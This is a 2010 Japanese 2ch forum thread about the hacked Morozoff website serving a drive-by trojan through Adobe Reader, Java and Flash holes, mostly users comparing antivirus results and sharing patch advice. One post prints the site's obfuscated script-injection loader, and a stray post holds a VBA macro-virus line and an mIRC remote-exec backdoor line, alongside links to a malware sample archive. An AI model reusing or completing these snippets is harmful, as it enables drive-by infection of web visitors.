はいはいNoScript余裕余裕

>>308
マジかよAvast入れてくる

ノートンで今スキャンしてる
これでウィルスが検出されなきゃ大丈夫？

カスペでTrojan-Downloader.JS.Agent.ewhって出てるぽい

なにしてんだよ死ねよ

んで結局モロゾフさんは何が目的なん？

やっぱりだめだよね
スキャンしてくるか…

Javaが6-17なら大丈夫なのかい？

>>323
おまえ通報したw

とりあえずノーガードVista+IE8(保護モード＋一般ユーザー権限)で踏んでみたけど余裕

mse無反応
javaを起動してないからか？

なんでマカフィーのやついないんだよ

windows security essentialsはばっちり検知除去
さすがゲイツ

>>308
サンクス

>>252

　　　　　　　おれだ
　　　

MSEで無反応だったんだが対処法教えてくれ

Ａｖｉｒａたん仕事しねえ

>>317
へー
ちなみにこんな文章が出た

Rift tipoff cobble donor sake tt heel saw lies rift fist.
By at from of out through answered the this. Answered the this ismyron frock dave fist. Up according as after
behind over under by at from of.
Cobble donor sake tt heel saw lies rift. Fist rem tipoff cobble donor sake.
Through answered the this ismyron frock dave fist rem tipoff cobble. Saw lies rift behind over. Rift donor
sake tt heel saw lies rift answered.
Under by at from of out through answered the this ismyron frock. Cobble donor sake tt heel.
Cobble donor sake tt heel saw lies rift. Under by at from of out through answered the this ismyron. Out
through answered the this ismyron. Under by at from of.
Into to without upon up according. Upon up according as after behind over under by at from. Without upon
up according as after behind over under.
Dave fist rem tipoff cobble donor sake tt heel saw lies rift. Tt heel saw lies rift for.
Rift donor sake tt heel saw lies rift in for.
In for on into to without upon.
Donor sake tt heel saw lies rift frock dave fist rem tipoff. By at from of out through. Up according as after
behind. Sake tt heel saw lies rift into to without. Frock dave fist rem tipoff cobble donor sake.
Of out through answered the this ismyron frock dave fist rem tipoff. Frock dave fist rem tipoff cobble donor
sake.

>>326
ノートンだめだって言ってるだろうがw
アホなのか?

これよりもJR東日本のサイトが改竄されて、トロイが仕込まれてたことの方が被害デカそうだな。
しかも、11月末から12月半ばにかけて時刻表検索ページに仕込まれてたから、
帰省でダイヤ調べようとした一般人（特に高齢ユーザー）が被害に遭いまくってそう。
そして気づいてなさそう。

>>326
>>313

ほんとaguseさんは偉大やで

くっそくだらねースレ開くんじゃなかったわ
何がコップ代わりだよ…全然おもしろくねーよハゲ

さすがはマカフィー反応したぜ

383 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2010/01/04(月) 03:35:07
tp://www●naito-akira●com/
新型っぽい。

これと同じっぽいね

このスレのリンクは踏むなという俺の長年のＵＧの直感

常駐無しなんで踏めないわ。

>>342
え？
わかった
オンラインスキャンをやってくる

>>243
サンクス

>>351
avast入れろよ。フリーソフトだし。

>>244をクリック一回で全て更新チェックしてくれるようなソフトって無いかね？

Kasperskyアンチスパムが正しく動作しないのが不愉快
対策方法があるなら教えろ

どのURL踏めばいいのかわからんので
スレ内をaviraで抽出したら非対応だったか
ヤベー踏むとこだった
セフセフ

今年は公式サイトにウイルス仕込む事件が流行しそうだな

>>326
ノートンが対応してりゃな

少し上も読まんヤツは自力でどうぞ

つまり安いマカフィーはだめなんだな
アルテミスっての買えってことか

>>354
これは？
http://jvndb.jvn.jp/apis/myjvn/

んでこれ踏んだらどうなるわけ？
ウイルス感染するとどうなっちゃうわけよ？

バレンタインを見越して知名度を上げる作戦なのか
ちょいとオイタが過ぎるな

サイトの保守が弱い中小企業で
且つ
スイーツや情弱層がアクセスしそうなサイト
は怖いね

とりあえず、MSのスマートスクリーンとGoogle先生には報告しておいた

要するにバスターで踏んだ俺死亡か

ウィルス対策ソフト作ってる会社が
競合つぶしのために
自分のソフトしか検出できないウィルス作るとかないかな

2010バレンタイン作戦だな

なんで検地しないのがわかっていてもみんな踏めるの?
仮想マシンか捨て用マシンで踏ませてるの?

トロイプリンってうまそうだなおい

オンラインスキャンが一番安心なの？

とりあえずMSEをそのまま使ってて無反応だって言ってる情弱はこれやっとけ

■更新間隔を1時間毎に変更する方法 (XP)

1. レジストリエディタを起動する
2. HKEY_LOCAL_MACHINE → SOFTWARE → Microsoft → Microsoft Antimalware → Signature Updates
3. 右クリック → アクセス許可(P)
4. Administrators の「フル コントロール」にチェックを入れる
5. SignatureUpdateInterval の値を 0x00000001 (1) に変更する
6. PCを再起動する
7. おわり

■更新間隔を1時間毎に変更する方法 (Vista/7)

1. レジストリエディタを起動する
2. HKEY_LOCAL_MACHINE → SOFTWARE → Microsoft → Microsoft Antimalware → Signature Updates
3. 右クリック → アクセス許可(P)→詳細設定→所有者→現在の所有者をAdministratorsを選択してOK
4. Administrators の「フル コントロール」にチェックを入れる
5. SignatureUpdateInterval の値を 0x00000001 (1) に変更する
6. PCを再起動する
7. おわり

踏んでもなんともないよ
気にするな

>>368
Vista＋IEの保護モードが強力だから、ノーガードで踏む

おいィ
AVGでスルーされたからカスペ最新いれて更新してスキャンしても検知されんぞー
つまり平気ってことか？

ちょｗ興味本位で踏んだら強制シャットダウン勧告がｗｗｗｗ
やばすぎるｗ

スキャンしたけどIEのキャッシュからアドウェア消しただけだったこりゃダメだｗ

>>331
WindowsUpdate(最新は12月9日、自動更新でおｋ)してない
Javaが6_17未満
AdobeReaderでAdobeJavaScriptを切っていない
FlashPlayerが10.0.42.34未満

どれか1つでも満たせばアボン

Java
コンパネのJava見てね

AdobeReaderは最新の9.20でもやられる
(ゼロデイ攻撃中、パッチは13日の予定)ので
[編集][環境設定][JavaScript][AcrobatJavaScript]を切る。
ブラウザのJavaScriptとは全く関係がない。

FlashPlayerのバージョンテスト
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm

>>1
view-source:http://www.morozoff.co.jp/
<script>/*GNU GPL*/

GENOだな。間違いない

何かの信用が極端に落ちた
こんな目前でやられちゃあな
で、マジで誰がやったの？
知ってる人居ないの？
推測でも良いので誰か教えてくだしあ＞＜

>>360
お、ありがと。使ってみるわ

おまえらこれわざと踏んでモロゾフにプリン乞食する作戦だろ

avastさんにここまでのログ削除されたっすけど。なんか貼ってあったん？

再読み込みする価値もないだろうけどなｗ

>>369
新商品みたいでいいなぁ

>>370
常駐だろ
感染してからスキャンするより安心

このスレ開いただけでavast反応したんだが

view-sourceそのまま貼るとリンクになるからやめれ…

mseフルスキャンしたら検出した
最初に開いた時に検出しやがれってなもんだ

VistaだがコンパネにJavaがないのはなぜだろう

2ｃｈのレスとかに
あんまり極端に反応するのもうざいよな

>>354
JavaとFlashだけならF-Secure Health Check

これがホントのモロゾフカクテルってわけか

プリン食いたくなってくるな

>>382
ウィルスコード貼ったバカがいただけ

>>388
あれSun…じゃないやOracleの製品だから
自分で入れなきゃ入ってないよ。

アウトなのがわかったのはいいけど、対応してるセキュリティソフトでいちいちスキャンしないといけないのか

おい６時頃は検索しても踏んでも何も無かったのに
今ググっただけでavast先生に怒られたぞ

ちょっとおまえら声優の白石みのるの事務所のサイト開いてみて

iPhoneだがなにも変化なし

>>382
>>111
これかな

>>382
みんながわざわざソース最下部っていってるのにそれを張ったバカ>>111

JR東日本の件もこれと同一人物による犯行かな？

>>394
Dellマシンを買ったときには入ってたんだけど
OSの再インストールしたらJavaがいなかったので
自分で入れたんだけどなあ

有料で定番のノートンより働くAVASTさん最強すぎるだろ常識的に考えて・・・・・・・・・
ノートンに金払ってる人よ嘆くことはないぞ君にはAVASTさんがついている！

http://www.avast.com/jpn/download-avast-home.html

あら、ふつうのマカフィーも検出した
ttp://www.virustotal.com/analisis/94a2bd34b99ebb992e019c2b7b05e4ed6e6b9400b313b1de1cd60366e2eaa2b3-1262614148
ウチのスキャンもなんか１コ拾ってるし
ビンゴだといいなぁ

>>111
馬鹿くうきよめ

よし
Mac＆狐で探検してくる

この手は詳しくないんだけどさ>>111ってどこから獲物をダウンロードしてるの？
そこら辺を追求すれば製作者とかの手がかりになるんじゃないの？

avast使ってます

>>377
＞AdobeReaderでAdobeJavaScriptを切っていない
コレやってないわ、だからいきなりadobe更新のお知らせみたいなのが来たのか

バスターは反応しなかったけど感染してないってことだよな

フラッシュプレーヤうｐデートしようとしたらへんなアドオンみたいなのぶち込まれた出後ざるの巻き

アドビリーダーが起動したが

てゆか、>>111を検出してるかもしれんのか・・・はぁ〜

どうでもいいけどJREはアップデートしたら前のバージョンを自動で消すようにしろ

>>401
JR東日本もHONDAも信越放送もアニたまもモロゾフも同じ。
コードの頭に「GNU GPL」か「CODE1」、
最終的に到達するドメインのポートが8080。

AdobeReaderってどうやって起動すんの？

ググっただけでウィルスって侵入出来るの？
怖すぎ

>>410
プロセスに変なのいなければおｋ

どうせcomodoはスルーさ

>>410
踏んだんならアウトじゃないの？
むしろ。検出しないってことはソッチの方が厄介では?

騒ぎになってるな

トレンドマイクロのオンラインスキャンは検出する？

>>407
DNSのIPをころころ変えてるから、全容はまだわかっていないはず。
AdobeReaderの1/18のUpdateが出るまでは、おとなしくしておけ。

ゼロデイ攻撃だし。

再読み込みした
>>111か
まあそんなことだろうとは思ったけど。
最近はウィルスコード貼る奴減ったな。昔は荒らしさんがよく貼ってたのに

>>231
読めない奴はクズだよｗ
日本人としてチンカスだよｗ

avast煎れた
次の指示を頼む
オンラインスキャン？

avast氏が何回も鳴ったんだけど、沢山仕掛けられてるって事？

>>412
件のサイト踏んだからリーダーが起動しちゃったってこと？
それはヤバいんでないの？

>>410
バスターなんか使ってて文句言う方が滑稽だわw

>>424
除外しとけよ




ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-

よくわからんが、Javaのコーヒーアイコンが立ち上がってタスクに入っててウザイ。
あと、Chromeだけど、何もねーよ？

TridentとかIEだと何かあるんじゃねーの？ｗｗｗｗ

>>426
全部のHDDスキャンしてこいやー

このスレ更新しても大丈夫だよな？

>>426
なんでそんなにオンラインスキャンしたいんだよｗ
普通にavast!のVPS更新してからフルスキャンすれば？

オンラインスキャンするならカスペルキーがいいっぽい。

>>432
おｋ
ありがとう
お前優しいな
プギャーされたときはむかついたけど見直したよ

食らったみたいなんだがシステムの復元じゃ治らないの？

>>426
隔離されればおｋ

MSEでフルスキャンしてるけど何時間かかるんだろう・・・

mcAfee無反応ｗ

>>434
わかった
まじで脇汗がやばい
早く安心したいわ

>>431
ブラウザ関係ないと思うよ火狐で感染したらしき人もいるし
念のためスキャンしといたら？

>>431
WindowsUpdateしてませんってならそうだけど
AdobeReaderやFlashPlayerやJavaはブラウザ関係なく
(IEもFxもOperaも等しく)やられるよ。

Chromeは砂箱で無事かもしれんし、それ回避のためかMac避けか
UAに「Safari」が入ってると発動しないようなコードなら見たことある
(今回のじゃなくちょっと前にね)。

モロゾフのサイトで反応しなかったノートン先生が、このスレに反応した

これってvistaと7は感染しないんじゃないの？

さすがノートン先生 空気読めない

>>435
発見して隔離したら削除
バスターはお前の嫌いな奴に｢最強のウィルス駆除ソフト｣って言ってプレゼントしてこいw

リモートデーターサービス データーコントロールを実行しようとしていますと警告が出るが

>>371
ありがとう

反応しなかったＡＶＧで振るスキャンして意味あるの？

>>443
恐らく違うウィルスコードに反応してる予感w

俺もavastたん入れてみるか
ぐっばいAVG

>>438
昨日やったら12時間くらいかかったよ
低スペ+ファイル数が230万くらいだったからかもしれないけど

そしてアドビリーダーが起動したみたいだ

firefoxtoとnoScriptでノートン先生沈黙してたのに
>>111のせいでノートン先生イラっとしてるｗ

バスターなんにも仕事してくんないやｗ

>>447
あんたも新しい定義ファイル落としてから回線切ってスキャンしなさい

色んなスレにリンク貼ってるバカがいるんだが
アク禁してくれよ

Adobe Readerが起動する時点で手遅れ感バリバリだろｊｋ

MSE評判いいけどどうよ？

マジでavastが暴れたｗｗ多量に仕掛けられてるな
つーかフリーなのにavastはすごい、AVG、antivir、kingsoftはこれを期にやめときな

Kaspersky
Online Scanner

現在メンテナンス中のため、ご利用いただけません。ご迷惑をおかけして申し訳ございません。
機能を強化した新しいバージョンのカスペルスキーオンラインスキャナが近日中にリリースされます。
また、個人向け総合セキュリティソフト「Kaspersky Internet Security 2010」の無料試用版 (有効期間:30日間) をダウンロードしてご利用いただけます。

泣いた

モロゾフに連絡した人って居る？

脅威となる恐れがあるコードを貼付けた>>111はアウト？セーフ？
とりあえず通報してみる

>>455
gigigiの時も一番対応遅かった希ガス
それからカスペに乗り換えた

>>459
最高

このスレにもモロゾフにも反応しないＡＶＧちゃんかわいいよ、今まで一度も仕事したことないよ

avast落としたら回線落としてスキャンすればいいのね

>>54
>>70
>>117

基本的に、ラテン語の発音から来てますが、
Europe圏内（English,Irish含む）ではJ系の言葉は　やゐゆゑよ　で呼ばれる。
bはフ。
ｖは発音の違う、フ

Jeroenとか、ユルンて言うんだ。
Jacobは、ヤコフだね。
Jeronimoとかは、イェロニモだよ。エロにもさんだね。
Jan　feterb は、ヤン　フェテァフ

映画監督は、　Jan De Bont ダッチ（オランダ人）だよ。

とりあえずMacでｻｲﾄごそごそしてるけどどうやってこんなの仕込んだんだ？

>>461
http://www.nifty.com/security/vcheck/

>>463
コードは検出ソフトが反応するだけだからまだいいよ
許せないのはあちこちにリンク張ってるやつ
それこそ犯罪だよ

やられたか

>>459
定義ファイルを常に最新するように変更していればいいけど
デフォのままならザル

定義ファイルの更新間隔の変更はGUI上からはできないから
素人にはおすすめできない

明日モロゾフは謝罪な

>>459
検出はいいけど動作がもっさりしてるかな
個人的には重要なのは動作じゃないと思ってるからいいのだけど

avast入れて踏んだら感染しないの？
トロイを発見で切断したとなるけれど

>>466
AVGちゃんの空気っぷりは異常

noscript入れてみて思ったんだけど普段JavaScriptってなんに使われてんの？
Googleのりんごは落ちなくなったけど

>>458
AdobeReaderのAcroatJavaScriptを切ってあれば問題なし。
でも切ってない人多いだろうね…。

Firefox使いはこれ入れときゃ大丈夫だから
ttps://addons.mozilla.jp/firefox/details/722

>>476
問題ある？

赤いｗ

もうすぐうまいプリンが食えるな

>>1
このスレ開いただけでトロイ検出したぞコラ！

モロゾフは被害届出すんじゃないの？
不正アクセスに加えて、営業妨害も良いとこ

で、Chrome何も無いけど（(； ･`д･´)

犯されてないよね。

うおっマジかよ。コップとやらが気になって夕方みちまったぞ・・・

常用してるブラウザにJavaなんか滅多に使わないんだからいれるなよ
サブのやつに入れとけ

バレンタイン中止のお知らせ・・・に

感染すると分かってリンクを貼って、金銭的損害を与えたら普通に犯罪なので注意。
まぁここに居る人なら知ってるか・・・

avastたんインスコした
定義最新にして回線引っこ抜いてフルスキャンでおｋ？

>>487
モロゾフの容器はコップじゃねえ

aviraたん無反応
でもCOMODOのDefense+がAcroRd32.exeの実行を阻止した
これってセーフ？アウトか？

可愛い可愛いAvastベータちゃんがポンポンポンって言った

変なプロセスやファイル見えなくても、rootkitみたいに隠されたら終わりなのかなあ…
怖いからどこも見たくない。もう寝る。

>>462
一応､管理者にはメールしておいたけど
まぁ手遅れだろうなw

>>481
問題ないです
ただ不安になってしまったので

>>493
セーフ
心配すんな

>>486
Chrome+カスペ
遮断で警告
ブラウザ関係あるの？

Win7 64bit ＋ avira

プニルが落ちただけでなんともないな

期限切れのESETがトロイ検出して
新しく入れたエッセンシャルは無反応
ほんとMSはゴミだな

avastちゃんが割と鉄板だってのを知っただけでも収穫になったわ

まぁセキュリティは甘甘だけど、踏まなかった俺大勝利だな
回線きってフルスキャンとかイライラくるからな

感染してるやつ

プロセス見てみろ変なのが('A`)

>>504
ｋｗｓｋ！

Chromeで踏んだら、Javaがクラッシュしますたとかでて、それだけだ。
なんか影響あるのか？

>>504
変なのってなに？

ノーガードの俺踏んで＼(^o^)／ｵﾜﾀ

comodo無反応だがAdobeReader入れてないから関係ないのか？

>>503
このスレ開いただけでアウトだ

げえマジかよ
Adobe readerなんて起動しなかったけど
どんな症状が出るの？

他ファイルへの感染は今のところない。
プロセスで確認して　プロセスチェッカーでトロイのファイルの場所を見つけて駆除すればひとまずok

>>510
んなわけない馬鹿か

ノートン、バスターはぼったくりだな
ESETとKasperskyはさすがだわ

ちょろめでひらいたらｼﾞｬﾊﾞさんが動き出して止めた

>>504
~TM108.tmp
こんな感じのやつ？

>>504
Administratorじゃないよな？

ついさっき調べものしたらavastがトロイ検出したんだけど

Windows Defender が知らぬ間に無効にされてた

もうスレタイ「このスレでトロイ配布中」に改名しろよ

>>513
開いただけでESETはトロイ検出したんだよ馬鹿

この前のJR東日本の改ざんと同じタイプか？
サイト管理者はSFTPとか使ってない場合アカウント情報抜かれるから注意しろよ

>>510
嘘つけ。
このスレ開いて、怒られるのは大抵誤検出だから安心しろ。JavaScriptが実行されることはない。

>>516
そう

>>517
ログインしているユーザー名
systemにはいない

>>521
ばーかばーか

モゾｒｐフ

>>521
えっ

おおavast!が久々に激怒してるｗｗｗ

これ、感染した奴はクレームメール送ればチョコ貰えるんじゃないか？ｗ

>>521
2chは除外設定にしとけよ

AVGちゃんの奥ゆかしさに惚れた

>>521
ソースのテキストを検出しただけだよ
テキストじゃ何も出来ないよ

>>524
まさか　をつけ忘れたｗｗ

adobereaderのjava切ってなくて
うえに警告バーが出て無視してタブ閉じたら強制停止されたんだが
セフセフ？
readerは起動しなかったんだが。
アプりは全部最新版でwin7でadobe以外の条件は大丈夫なんだが
MSEが無反応で今フルスキャンしてる。セーフなの？

うわあああああああああああああああああああああ
早速TELNETでユーザ名的確に打って総当たり攻撃ｷﾀ━━━━(°Д°)━━━━!!!!

ファイル抜かれるからIP変更するさらばあああああ

>>534
⊂ミ⊃＾ω＾ ）⊃　ｱｳｱｳ!!

困った時の初期化でもしようかね

avast　検索おせーな
もっと急げ

telnet、、、telnet、、懐かしい言葉だな
ＮＩＦのソフトでわかるかな

ip変更するか

なんだか無知を曝したようなのでもう寝る

ID:HGa6Gw9eは無事か？

adobe readerとかPDF専用だろ？
いらねーからアンインストール済みだわ

>>441
>>442
ウィンドウズは毎日と言わんばかりにアップデートしてる、この前はJavaアップデートした。
けど、一応マカフィーフルスキャンさせてるよ。

親切にも、ありがとうな。

>>536
アウアウ!?
特価品スレに張ったやつ死ねよマジで。
プロセスに上記の謎プロセス無いんだが実はセフセフ？

>>7
えみりん；；

ｷﾀ━━━━(ﾟ∀ﾟ)━━━━!!

>>541
まぁつなぎ直してID変えてきなよ

オンラインスキャンしなされ。
http://www.nifty.com/security/vcheck/index.htm

プリンのガラス容器いいな

>>545
うんｗ

>>478
ブラウザ上の単なる文字と画像以外のほとんど全てに使われていると言っても過言ではない

>>541
馬鹿晒して一つ賢くなったんだからいいじゃないか

ウィルスバスター入れているが、コップスレ見て夕方サイト踏んだ
対応してないようだけど一応スキャン→検出されない
ノートンも対応していないらしいし、カスペルスキーはずっとメンテナンス中
どうしたらいいの？
avastってやつはウィルスバスター常駐させたまま使っても大丈夫？
教えて下さい

>>499
オレ定期的にアップデートさせてるから問題無いのかもね。
昔感染したHDD繋げたら反応した、mcAfeeタンが無反応なものでｗ

一応、フルスキャンかけてるけどね。

>>554
明日の「教えてクン」を目指す、若き戦士達に以下の文章を捧げる。
日々精進し、パソコンヲタクどもの親切を蹂躙してやれ。

１．努力を放棄すること
　　いやしくも「教えてクン」たるもの、努力をしてはならない。過去ログを読んだり、検索してはいけない。
　「英語は苦手なので、分かりません。」は、高く評価できる。
　辞書片手にマニュアルやReadMeを読むなど、決してしてはならない。
　他力本願と言われようと、自分で調べたり試行錯誤したりせず、他人の努力の結果を搾取するのが、正しい「教えてクン」である。
　また、「もう何が悪いのかサッパリ分かりません。」と言ってふてくされるのも有効である。「サッパリ」という単語が

「やる気の無さ」を効果的に表現している。
　「原因を特定するには、何をすべきでしょうか？」と訊いてしまうと自己の積極性が現れてしまうので、「教えてクン」失格である。

２．情報を開示しないこと
　　使用ＯＳや、機器構成などの必須の情報を知らせてはならない。
　マザーボード名やＢＩＯＳのバージョンも同様だ。具体的なアプリ名やバージョンも隠蔽すべきだ。
　「ＤＶＤ再生ソフト」のように曖昧に表記しておけばよい。
　反対に「前から欲しいと思っていた○○」とか「安売りされていた○○」　等の「どうでもいい情報」は、どんどん書いてやれ。
　　トラブルの場合は、状況を正確に記述してはならない。
　「なんだかうまく動きません。」とか「エラーが出ます。」等と具体的なことは何も書かないことが重要である。
　また、自分の試してみた事も具体的に書いてはいけない。
　考えられる組合せのマトリックスを作成し、状況を整理するなどもってのほかである。最悪の場合、それだけで問題が解決してしまこともあるのだ。
　「いろいろやってみたけど、動きません。」が理想的だ。

>>554
一回バスター切れ
俺もバスター切ってavastで検索中

ESETがお似合い

コップ見たくてHP見たんだけど、トップ踏んでなければ大丈夫だよね。

>>535
ｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━ !!!!!

>>551
やべえぞこれは何も信じられないパターンだ
アウアウかセフセフかわからねー
クリーンインスコしたくねー

Adobe氏ね
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2106

怪しい奴ってこれ？

<script>
try
{
window.onload = function ()
{
var U26gcel3nnek = document.createElement('s@$$&c)$&r$i#(p#$!t!!('.replace(/@|\)|\!|\(|\^|\$|&|#/ig,
''));
var Zavq7z4z78k = 'Imrp1rhevfo';
U26gcel3nnek.setAttribute('type', 't(^$e&@&x!!$t!@&/)j((a)v&&a@(^s(!c((r!i$!p!$t!(#'.replace(/\^|#|&|\!|\(|\$|\)|@/ig,
''));
U26gcel3nnek.setAttribute('src', '糞長いので省略'.replace(/\!|@|#|\$|\(|&|\^|\)/ig,
''));
U26gcel3nnek.setAttribute('defer', 'd!$@$e@f!!(&(e^r@)'.replace(/@|\(|\$|#|\!|\)|\^|&/ig, ''));
U26gcel3nnek.setAttribute('id', 'M$e!$7#!)r#!$l？@^9()!(#t$!^9&q#)@$$b&&^!3&@)'.replace(/\^|\)|@|&|\$|\!|\(|#/ig,
''));
document.body.appendChild(U26gcel3nnek);
}
}
catch (Lpmpa57y1j) {} </script>

もう少し綺麗に頼む

これどっかのスレにＨＰのアドレス書いたら犯罪になる？

ウイルスあるって知っててアクセスする人って
自分が使ってるウイルス対策ソフトに地震があるの？

>>377
> FlashPlayerが10.0.42.34未満
これだけ該当してたんだが、感染確定なの？

http://bit.ly/sGMW5?axfc.net/uploader/He_559417.zip

ソース見たけど普通っぽい
チェックしてないのか

オンラインスキャンでTemp\jar_cache312746138945917647.tmpがウイルスとして出てきたが今回の犯人はこいつか？

>>557
ありがとう
切るタイミングは、avastインストールした後でいい？

>>563
そう。
おそらく、ロシアのサイトにつないで、ウィルス本体を落とそうとする。

>>554
Live One Careのオンラインスキャンかけてみれ
MSE同じはずだから

>>557
切るんじゃなくて削除しろ
競合して良いこと無いぞ

>>563
replace(/@|\)|\!|\(|\^|\$|&|#/　って書いてあるだろ、馬鹿。

プロセスにおかしな名前ないけどavastのスキャン時間かかるしなんかもう面倒だからクリーンインスコしよう
AVGとzonealarm使ってたけどavastとzonealarmに乗り換えたほうが良いよね？

GENOウイルスまとめ
http://www29.atwiki.jp/geno/

GENOウィルス・何をすれば良いか分からない人のまとめ
http://www40.atwiki.jp/gegegeno/

>>564
やめとけ
これはふりじゃね-から

>>570
インストールして次にウイルスデータベースを更新して再起動
再起動したらまずバスター切ってavastで検索

>>36に飛ばされる

>>570
先に削除してから
一心不乱にスキャンしろ
スキャンしてる最中に余計なサイト開くな
大人しくテレビでも見てろ

avastは少し前に起きたぷぁ〜んぷぁ〜ん祭りがあってから抵抗がある

>>502
avast!たんは割と引っかけてくれる。
ただちょっと余計なもの(無害なファイル)まで引っかけてしまう性癖があるんだ。

当たり前だが携帯から無線LAN経由で普通に見れた

>>580
>>>570
>先に削除してから
>一心不乱にスキャンしろ

と言うより、スキャンしている最中、ネット切っとけ。

SecurityToolとかいうのがインストールされて何も出来なくなった

ロシアからsshアタック来るんだけど・・・俺もルータ再起動してくる

>>575

おにーちゃん。

おにーちゃんって、こっち、こっち。

この子どや？な？

mcAfeeていう外人さんや。

サービスええで〜、な、一年大体5000円ぽっきりでええねんて。

な、入ってててや。
ええーやん。な。な。

以上、新地チックにｗ

予備スキャンの結果、悪意のある、または望ましくない可能性のあるソフトウェアがシステムに存在するおそれがあることが判明しました。
スキャンが完了した時点で、検出された項目を確認できます。

　|　 |ﾉﾊヽ
　|　 |。‘从 ＜MSEでフルスキャン中なんだけど、↑が出てる
　|＿と ）　　　 感染してんのかぁ…
　|桃| ﾉ
　|￣|

>>572,578,580,584
ありがとう
インストールしてくる

>>534
んー微妙。大丈夫な気はする。
7やVistaのUACのがんばり次第だね。

トロイならIP変えても意味無いと思うんだけど
FW入れてるの?

>>588
俺も出てるけどスキャンが完了しないことには何もできん

スプリクト系とめればいいじゃん

レジストリいじってIP変えて再起動してきた
>>371
もう一度礼を言わせてくれ。ありがとう

応急的な対策

ttp://fatestyle.blog84.fc2.com/blog-entry-53.html

>>579
だってHTMLのBODYの外に<script>が書いてあるんだもん。
そこに飛ばす先がきちんと書いてあるよ。

504 名前： アスピレーター(アラバマ州)[sage] 投稿日：2010/01/05(火) 00:05:24.72 ID:9xzGeSng
感染してるやつ

プロセス見てみろ変なのが('A`)


516 名前： カッターナイフ(鹿児島県)[sage] 投稿日：2010/01/05(火) 00:08:10.60 ID:JBW7jlI0
>>504
~TM108.tmp
こんな感じのやつ？

524 名前： アスピレーター(アラバマ州)[sage] 投稿日：2010/01/05(火) 00:10:12.00 ID:E7kbsyQA
>>516
そう

>>517
ログインしているユーザー名
systemにはいない

535 名前： アスピレーター(アラバマ州)[sage] 投稿日：2010/01/05(火) 00:12:24.54 ID:E7kbsyQA
うわあああああああああああああああああああああ
早速TELNETでユーザ名的確に打って総当たり攻撃ｷﾀ━━━━(°Д°)━━━━!!!!

ファイル抜かれるからIP変更するさらばあああああ

SantSvc.exeは何？

カスペとバスターを同時にインスコすると
二日立っても再起動出来なくなる

順序はカスペ　バスターとインスコすること
逆だとカスペがバスターをアンインスコしちゃう

まあ実験のつもりだったんだが結果が無い実験だったな

安っいマカフィー優秀！


検出の種類：トロイの木馬
検出名：JS/Redirector.d
状態：修復済み
テンポラリー･インターネットファイルの中にあったよ

対応の必要は無いって書いてあるけど、
削除しなくて良いのかな？

>>597
一体何が起こってんだ

>>111
(^u^:)
顔文字があるってことは犯人は日本人だな

プロセスにもなんとか.tmpとかおらんし失礼な。

オレだけハミ子かよ！
オマエらはそれで良いのかよ！

さすがν速民だな(´；ω；｀)

今から寝ながら鬱々してやるが。

>>588
単にスパイウエアじゃね？無事を祈る

クリーンインスコ後ってセキュリティソフトインスコとwindowsupdateどっち先にやればいいの？

>>601
書き込みが本当なら
見知らぬ人に身動き出来ない状態の時に体中まさぐられてる感じ
んでポッケに金目の物が有ったら持って行こうと｡

>>600
マカフィーでいけた？

>>605
うｐだて

>>566
踏んだブラウザでFlashPlayerが動く(YouTubeなどの動画が見られる)ならアウトかな
(セキュリティソフトやUACが仕事しなければ)。
ちなみにFlashPlayer9.x系は9.0.260でもセーフ、
ただしいずれ切られるのでとっとと10に移行推奨。

Flash Player 9 for Unsupported Operating Systems
ttp://kb2.adobe.com/cps/406/kb406791.html
MEでも動くらしい。

>>605
Update→ｲﾝｽｺ

研究用のアレ
ttp://www.dotup.org/uploda/www.dotup.org529680.7z.html

McAfee VirusScan Enterpriseは駆除してくれたな。
よしよし。

勘違いしてる奴いるけど、感染した場合、IP変えてもなんの意味も無いからな。
繋ぎに行こうとする先をブロックするか、ウィルス自体を無効化しない限り、発信し続けるぞ。

>>608,610
THX
acronisで一気に去年の７月までロールバック

↑これってなんて読むの？
いい加減金へんうざいんだが

踏むとAdobe readerが起動して
それでアウトってこと？

もしかしてウイルスバスターはスルー？
いま3ヶ月無料で使ってるんだけど、他のに変えたほうがいい？

カンナだ低学歴

>>615
あわび

>>615
かんな

ちょ・・・aviraたん・・・

>>607
http://www.virustotal.com/analisis/94a2bd34b99ebb992e019c2b7b05e4ed6e6b9400b313b1de1cd60366e2eaa2b3-1262614148
によると、一応イケることになってるみたい

おいらは途中で接続切ったから、キャッシュの中だけで済んだのかも

>>617
avast!に変えたら？無料だし、なんか使ってるやつ多いし

俺はaviraだけど

>>616
読もうとする
対策してれば問題なし
つ-か対策してね-から起動すんだろ？
おとなしくｽｷｬﾝしとけ

>>590
UAC発動しなかったんだけど…。
MSEのフルスキャン中で>>588と同じ状態。
まじうんこだわ

>>618
ありがと
漢字ﾄﾞﾘﾙ100回でいいか？

なか卯のプリンって美味いのか？

>>615
ドラムカン

このスレ開いた途端NODが反応しやがった

マカフィでフルスキャンしはじめたけど時間かかるんだよなあ・・・くっそ

Adobe readerを削除している俺に死角はない
という事か

MSEはうんこだったのか

>>623
そうか、ありがとう。

>>624
いや、踏んじゃったのに
adobe reader　は起動してないんだ。
それで、reader の javascript　だどうのこうの書いてるから
疑問に思ってる。
ちなみに　reader　は古いバージョンだった。

IPアドレスかえても意味ないよ

ノートンオンライン先生が
ウイルスの状態: 安全!って言ってくれた
太鼓判や！

aviraで警告でたから接続しないって選択したんだけど
SUNのjavaアイコンが右下に表示されて、
プロセスに.tmpってやつがひとつ・・・・。

JRといいモロゾフといいかなり被害拡大してそうだなぁ

スレ更新するたびにavast先生が怒ってウザイ
コード張ったやつ市ね

AdobeReader削除してFoxit入れてブラウザのJAVAとJavaScriptとActiveX切っとくのが普通だろ

リーダー起きなかったおいらも検出されたから、
踏んだ人は一応スキャンしときなよ

したことメモ
・MSEアプデ
・>>371
・あふぉんWi-Fiで>>１開いてしまったのでルータ再起動

>>639
ログを除外すればいいんじゃないか？
除外しても影響がないでしょ。

>>632
地名無しって珍しいね

Firefox+noscriptでふんだんだがNIS2010無反応。このスレのコードにも無反応・・・
JAVAのバージョンがやばい。windows updateは最新。adobeReaderは入って無い
あやしげなプロセスはなし。NISやルータのログにも特に無し。
NISでネットワーク遮断して完全スキャン中も見つかったのはクッキー位。
エンコ中なのに完全スキャンとか・・・・・

ああ・・・

>>640
Foxitは必ずしも安全ではない

